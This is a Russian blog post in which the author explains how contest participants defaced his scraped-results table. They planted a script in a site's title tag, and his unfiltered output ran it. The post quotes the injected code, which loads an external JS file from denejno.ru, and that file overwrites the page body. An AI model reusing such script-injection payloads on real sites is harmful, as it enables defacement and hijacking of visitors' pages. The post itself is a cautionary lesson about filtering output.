.
Место для Вашей рекламы
24 Апрель 2011

Парсинг и JS Инъекции

posted in Полезности, Программирование |

На днях над моей табличкой конкурсантов, некоторые участники конкурса слегка поглумились — воткнули вместо таблицы с информацией обнаженную девушку — правильно сделали, раз уж парсишь — при выводе не забывай фильтровать !
Кому интересно и кто не в курсе — раскрою подробности процедуры:
Взглянув на табличку видно, что в ней выводится содержимое, сграбленного тега title — ну и некоторые ребята, решили проверить — фильтруется ли вывод, али нет 🙂
На denejno.ru в тег был вставлен JS код с подключением стороннего js файла.
А конкретно такой код

Денежно.Ру
<script>
var scid=document.createElement('SCRIPT'); 
scid.type='text/javascript'; 
scid.charset='windows-1251';  
scid.src='http:/'+'/denejno.ru/f.js?rnd='+Math.random(); 
document.body.appendChild(scid);
</script>
<noscript>



На искомой странице скрипт не выполнялся, т.к. был внутри тега title. А в моей табличке — как раз пошел на выполнение 🙂
JS код подключаемого файла:

document.body.innerHTML='
';

Спасибо хоть девчёнку симпотную поставили, а не член в пол-экрана — хорошая наука на будущее. А то как обычно — быстро, на коленке и в эфир. Теперь буду повнимательнее и не так ленив на счёт фильтрации, чего и всем желаю.

Оставить комментарий

Яндекс.Метрика